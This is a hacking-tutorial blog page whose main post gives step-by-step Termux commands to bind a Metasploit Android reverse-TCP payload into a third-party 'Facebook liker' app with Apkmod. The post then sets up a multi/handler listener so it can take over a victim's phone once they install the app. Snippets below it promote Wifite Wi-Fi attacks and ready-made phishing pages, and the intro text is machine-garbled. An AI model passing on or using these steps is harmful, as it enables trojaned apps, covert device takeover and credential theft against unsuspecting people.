Skip to main content

WHAT IS ETHICAL HACKING ?

Hacking—Definition, Types, Security, and the sky is the limit from there A regularly utilized hacking definition is the demonstration of giving and taking computerized gadgets and networks through unapproved admittance to a record or PC framework. Hacking isn't generally a malevolent demonstration, yet it is most ordinarily connected with criminal behavior and information robbery by digital lawbreakers.  Hacking alludes to the abuse of gadgets like PCs, cell phones, tablets, and organizations to make harm or degenerate frameworks, accumulate data on clients, take information and archives, or upset information related action.  A conventional perspective on programmers is a solitary rebel developer who is exceptionally gifted in coding and altering PC programming and equipment frameworks. Be that as it may, this tight view doesn't cover the genuine specialized nature of hacking. Programmers are progressively filling in refinement, utilizing covert assault strategies intended to ...

HOW TO BIND PAYLOAD IN APK FROM TERMUX

how to bind payload in apk from termux

how to bind payload in apk from termux - Hi guys if you are searching for how to bind payload in apk from termux and searching for the best article to get the best explanation about how to bind payload in apk from termux. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "how to bind payload in apk from termux". By this article, you can get a lot of about how to bind payload in apk from termux, apkmod tool, how to hack android mobile. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

how to bind payload in apk from termux

Hello, guys welcome back. So today let us learn how to hack android from Metasploit payload with the help of termux. In this method we will bind a payload with third-party application like  Facebook liker app and others, So to do that we need a tool named Apkmod which helps us to bind payload with the real app without any issue, Follow below steps to create payload and hack your target.

#Follow these steps

# apt-get update -y

# apt-get upgrade -y

# pkg install python -y

# pkg install python2 -y

# pkg install git -y

# pkg install wget

# ls

# cd $HOME

# wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

# ls

# bash setup.sh

Now here the installation process will start and it may take a long time to get done so please wait for it to complete...

Now download the application in which you would like to bind payload and hack your target. in my case i downloaded ApentalCalc Apk (Facebook Liker app), Now move your selected app to internal storage of your mobile, after that open termux and follow below steps.

# ls

# cd $HOME

apkmod -b /sdcard/yourappname.apk -o /sdcard/anyname.apk lhost=127.0.0.1 lport=4444

EX:- apkmod -b /sdcard/apentalcalc.apk -o /sdcard/liker.apk lhost=192.168.73.123 lport=4444

Like the above example, you have to type the command and after that hit the enter button and after that binding process can take 20-30 minutes so please wait for it to complete. After the payload is built successfully now open Metasploit in new session by typing.

# msfconsole

Now the Metasploit framework opens now in this you have to type these commands.

# use exploit/multi/handler

# set payload /android/meterpreter/reverse_tcp

# set lhost (your Ip)

# set lport (your port)

# exploit

Now, if your target installed the payload in his device then a meterpreter session will be shown in the Metasploit framework console. Now type help to get commands to hack your victim devices as you want...

Comments

Popular posts from this blog

INFORMATION GATHERING FROM TERMUX OSINT TOOL

information gathering from termux osint tool information gathering from termux osint tool   -  Hi guys if you are searching for information gathering from termux osint tool and searching for the best article to get the best explanation about information gathering from termux osint tool. Then you are in the right place. Today I'm here going to share the step by step tutorial about " information gathering from termux osint tool ". By this article, you can get a lot of about   Information gathering from name and number, termux osint tool,  information gathering from termux osint tool, how to use little brother tool, littlebrother tool in termux .  And I'm damn sure that you will never get all these unique information like us on the internet anywhere else. information gathering from termux osint tool Hello, guys welcome in another amazing post so today let us know about how to hack or gather information like hacker from osint tool named little ...

HOW TO RUN WIFITE IN TERMUX

(ps: most of the times I uses my old smartphone for Termux tutorial making, that's an old arm device thus I was failed to use wifite in Termux but if you're interested then you can try) Here how you can install Wifite in Termux Step1: Firstly Install Termux from Play store Step2: Type these commands one by one # apt update && apt upgrade # Pkg install wget #  pkg install python2 Step3: Now type this Command:   #   wget https://raw.github.com/derv82/wifite/master/wifite.py Then type  chmod +x wifite.py Final Step: Now you're ready to use Wifite Just type # python2 wifite.py Thats it (It requires Superuser Permissions, if you're root then try installing sudo in Termux)

HOW TO CREATE AADVANVCED PHISHING PAGES FOR TERMUX

advanced phishing pages for termux tutorial advanced phishing pages for termux   -  Hi guys if you are searching for advanced phishing pages for termux and searching for the best article to get the best explanation about  Today I'm here going to share the step by step tutorial about " advanced phishing pages for termux ". By this article, you can get a lot of about   phishing page download .  And I'm damn sure that you will never get all these unique information like us on the internet anywhere else. advanced phishing pages for termux tutorial Hello, guys i am back with another amazing post so today we will get to know about the best and advanced phishing pages for termux and kali Linux users and i hope you will gonna like the scripts which we collected. So let's get started. what are advanced phishing pages Advanced phishing pages are phishing page's itself but they are new and real looking so that's why we can call them as advanced phishing p...